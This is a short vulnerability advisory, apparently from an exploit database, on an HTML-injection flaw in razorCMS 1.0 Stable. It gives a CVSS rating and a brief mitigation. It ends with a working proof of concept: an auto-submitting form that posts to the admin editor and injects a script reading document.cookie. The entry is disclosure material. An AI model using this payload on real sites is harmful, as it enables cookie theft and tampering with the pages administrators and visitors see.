HTML-injection vulnerability in razorCMS

vendor:

razorCMS

by:

Unknown

7.5

CVSS

HIGH

HTML-injection

CWE

Product Name: razorCMS

Affected Version From: razorCMS 1.0 Stable

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:razorcms:razorcms:1.0

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

HTML-injection vulnerability in razorCMS

The HTML-injection vulnerability in razorCMS allows attacker-supplied HTML or JavaScript code to run in the context of the affected site. This can potentially lead to the theft of cookie-based authentication credentials and control over how the site is rendered to the user.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied data before using it in HTML output.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40373/info

razorCMS is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

razorCMS 1.0 Stable is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/admin/?action=edit&slab=home" method="post" name="main" > <input type="hidden" name="title" value="Home" /> <input name="content" type="hidden" value='hello"><script>alert("2"+document.cookie)</script>' /> <input type="hidden" name="ptitle" value="" /> <input type="hidden" name="theme" value="theme-default" /> <input type="hidden" name="check_sidebar" value="sidebar" /> <input type="hidden" name="save" value="Save Content" /> </form> <script> document.main.submit(); </script>